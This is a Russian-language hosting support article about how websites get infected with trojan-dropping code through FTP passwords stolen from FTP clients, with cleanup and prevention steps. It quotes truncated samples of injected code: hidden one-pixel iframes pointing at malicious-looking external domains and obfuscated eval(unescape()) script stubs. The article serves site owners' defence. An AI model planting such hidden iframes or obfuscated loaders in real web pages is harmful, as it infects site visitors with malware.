| Что такое Вирус ?
Слово "вирусы" давно и хорошо знакомо пользователям компьютеров. Оно давно переросло свое первоначальное значение и теперь часто употребляется для обозначения любых вредоносных программ, способных "размножаться", распространяясь с компьютера на компьютер и заражая подчас целые компьютерные сети - вплоть до глобальных эпидемий в интернете.
Как вредоностный код попал на сайт ?
Пользователи Вашего сайта начинают жаловаться на то, что с Вашего сайта к ним загружаются трояны. В лучшем случае антивирус начинает ругаться на скачивание трояна. Если Вас заразили старой версией или у Вас самые новые базы антивируса. В противном случае, Вы еще долго не будете знать, что у вас троян.
Вы или кто то, может обнаружить когда ваш сайт попал в черный список гугла.
В сети интернет распространяются вирусы которые воруют логины, пароли пользователя для FTP-соединений прописанные в многих программах, таких как Total Commander, FAR, SmartFTP и многие другие.
Полученную информацию троянская программа отправляет на электронную почту злоумышленника. Который в последствии, по предположениям, с помощью специального программного обеспечения в автоматическом режиме заходит на FTP сервера и прописывает в файлы index, main, и другие главные файлы лежащий корне и в дургих директориях, код с фреймом (< iframe) который ведет на вирус.
Еще как вариант, вирус заражает HTML файлы прямо на вашем компьютере, и вы сами загружаете их на сайт.
Если просмотреть исходный код html или php страниц, то вирус может выглядеть примерно так :
< script >eval(unescape('function%20dVN%28 ...... и тд
< script > function vdtVxVyVVVb(vbbataYtxxd){ function vaVxdtaYydV () {var vayYaYxyxdt=2; return vayYaYxyxdt;} return(parseInt(vbbataYtxxd,16));}function vYV ..... и т.д.
< ifrаmе src=' http:// 81.95.xxx.77/trаff.php' width='1' height='1' style='visibility:hidden'>< / ifrаmе >
< sсriрt > eval(unescape("***")); < /sсriрt >
< sсriрt >function v472ae9e6d9541(v472ae9e6d9d28){ function v472ae9e6da519 () ****document.write(v472ae9e6db4f9('****'));< / sсriрt >
< iframe src=" http:// orentraff.cn/ in.cgi?8 " ..... и т.д.
< iframe src=" http://c6y.at:8080/ts/in.cgi?pepsi143" width=125 height=125 style="visibility: hidden" > .... и т.д.
< iframe src="\http://gradipy.com/?click=3BA24B\" width=1 height=1 style=\"visibility:hidden;position:absolute\" > < /iframe >
Первая мысль, конечно, будет: "Файлы лежат у хостера. В файлах появился вирус. Сервер взломали и мне дописали вирус. Во всем виноват хостер" и Вы впереполненых чувствах от гнева пишите/звоните в техническую поддержку хостера. Но Вы далеко не первый, у которо появился вредоностный код. И проблему нужно искать начиная со своего компьютера.
Что делать?
1. Установить антивирус программу, если вы не имеете еe. Если у вас уже установлен антивиру то обновите антивирусные базы. Также не все антивирусы эфективны, проверяйте компьютер несколькими антивирусными программами. Например имея установленный один антивирус, вы можете скачать с сайта http://www.freedrweb.com/ бесплатную утилиту Dr.Web CureIt! и проверить еще им.
Также хорошо иметь Firewall и Spyware защиту. Например ZoneAlarm, которая включает в себе эти две возможности. А так же эти возможности имеют и другие программы, например Agnitum Outpost Firewall и др...
2. Немедленно сменить пароль на фтп и к панели управления
3. Немедленно сменить пароли на подключения к базе, почтовым ящикам, а также, логины и пароли, которые хранились в конфигурационных файлах (хакер мог их уже посмотреть).
4. Перезалить все файлы из чистой резервной копии (если таковая имеется), либо самостоятельно очистить файлы от вредоносного кода. Вирус может находится не только на самом видном месте файла, но и где то глубже спрятаться. При отсутствии бекапа просите хостера восстановить.
5. Периодически выполнять смену паролей доступа к FTP
Что нужно делать, чтобы максимально обезопасить себя от вирусов на сайтах?
1. Ставьте антивирусы и Фаирволы!!! Они помогают. Не всегда, но помогают.
2. Используйте альтернативные браузеры последних версий (Opera, Firefox). Забудьте о Internet Explorer. 90 процентов вирусов-троянов загружаемых через интернет используют уязвимости именно этого браузера. У Firefox (http://www.mozilla.org/) этих самых уязвимостей на два порядка меньше.Например, в браузере Opera можно отключитьобработку тега < iframe >;
3. Не сохраняйте пароли в фтп-клиентах. Они уязвимы и своровать оттуда пароль очень легко.
4. Регулярно поглядывайте на сайт и проверяйте файлы своего сайта.
5. Вы можете разрешить доступ к FTP только со своего IP, если ваш провайдер предоставляет постоянный IP
И в заключении, бывает что с вашим компьютером все в порядке и он не содержит вирусов но это не гарантирует сохранности паролей. Некоторые трояны имеют функции "сниффера" (Сниффер - программа для перехвата и анализа сетевого трафика) и находясь на каком-то другом компьютере в вашей подсети вполне могут, путем анализа траффика подсети, заполучить ваш пароль. Тем более что пароли FTP не шифруются. То есть для гарантии сохранности паролей необходим полный комплекс защитных мер для всей сети в целом а не только для одного лишь вашего компьютера.
|
 Добавить в избранное
 Распечатать эту статью
|
